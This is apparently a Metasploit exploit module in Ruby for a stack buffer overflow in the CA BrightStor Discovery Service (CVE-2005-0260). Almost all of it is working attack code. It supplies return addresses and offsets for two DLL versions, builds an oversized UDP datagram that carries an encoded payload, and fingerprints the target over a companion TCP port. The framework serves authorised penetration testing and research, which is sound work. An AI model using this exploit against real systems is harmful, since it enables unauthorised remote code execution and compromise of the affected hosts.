##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
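class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the CA BrightStor
          Discovery Service. This vulnerability occurs when a large
          request is sent to UDP port 41524, triggering a stack buffer
          overflow.
        },
        'Author' => [ 'hdm', 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0260' ],
          [ 'OSVDB', '13613' ],
          [ 'BID', '12491' ],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities' ],
        ],
        'Privileged' => true,
        'Payload' => {
          # The payload is written at offset 1046 of a 4096-byte buffer, so
          # 2048 bytes fits comfortably before the end of the request.
          'Space' => 2048,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{ win },
        'Targets' => [
          [
            'cheyprod.dll 12/12/2003',
            {
              'Platform' => 'win',
              'Ret' => 0x23808eb0, # call to edi reg
              'Offset' => 968,     # position of the saved return address
            },
          ],
          [
            'cheyprod.dll 07/21/2004',
            {
              'Platform' => 'win',
              'Ret' => 0x2380a908, # call edi
              'Offset' => 970,     # position of the saved return address
            },
          ],
        ],
        'DisclosureDate' => '2004-12-20',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(41524)
      ]
    )
  end

  # Fingerprint the service via its TCP listener on 41523 (a companion port
  # to the UDP 41524 listener that is actually exploited; RPORT is not used
  # here). Two probes are sent on separate connections: a bare 'META', which
  # is expected to go unanswered, and 'hMETA', which is expected to be
  # answered with the host name. Only that exact pattern is reported as
  # Detected; any other combination is Safe.
  #
  # @return [Exploit::CheckCode] Detected, Safe, or Unknown when the TCP
  #   port cannot be reached (previously the connection error propagated out
  #   of check instead of yielding a CheckCode)
  def check
    silent_reply = probe_tcp('META')
    named_reply = probe_tcp('hMETA')

    return Exploit::CheckCode::Detected if named_reply && !silent_reply

    Exploit::CheckCode::Safe
  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
    vprint_error("Connection to TCP port 41523 failed: #{e.message}")
    Exploit::CheckCode::Unknown
  end

  # Send a single oversized UDP datagram to RPORT. The saved return address
  # at the target's 'Offset' is overwritten with a call-edi gadget from
  # cheyprod.dll; the encoded payload is placed at offset 1046, the position
  # the layout notes below record for EDI on target 0 (the module uses the
  # same payload position for both targets).
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # Stack layout observed for target 0:
    #   ret @ 968, esp @ 971, edi @ 1046, end of buffer @ 4092
    # rand_text_english never emits NUL bytes, so the filler honours BadChars.
    buf = rand_text_english(4096)
    buf[target['Offset'], 4] = [ target.ret ].pack('V')
    buf[1046, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)
    # Wait for (and discard) whatever the service sends back before handing
    # control to the payload handler.
    udp_sock.recvfrom(8192)

    handler
    disconnect_udp
  end

  private

  # Open a fresh TCP connection to port 41523 on RHOST, send +request+ and
  # return whatever arrives within three seconds, or nil if the service stays
  # silent. The socket is always closed, even if the read raises, so a failed
  # probe does not leak the connection.
  #
  # @param request [String] raw bytes to send
  # @return [String, nil] the response, or nil on timeout
  def probe_tcp(request)
    sock = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => 41523,
      'Context' => {
        'Msf' => framework,
        'MsfExploit' => self,
      }
    )

    begin
      sock.put(request)
      sock.get_once(-1, 3)
    ensure
      sock.close
    end
  end
end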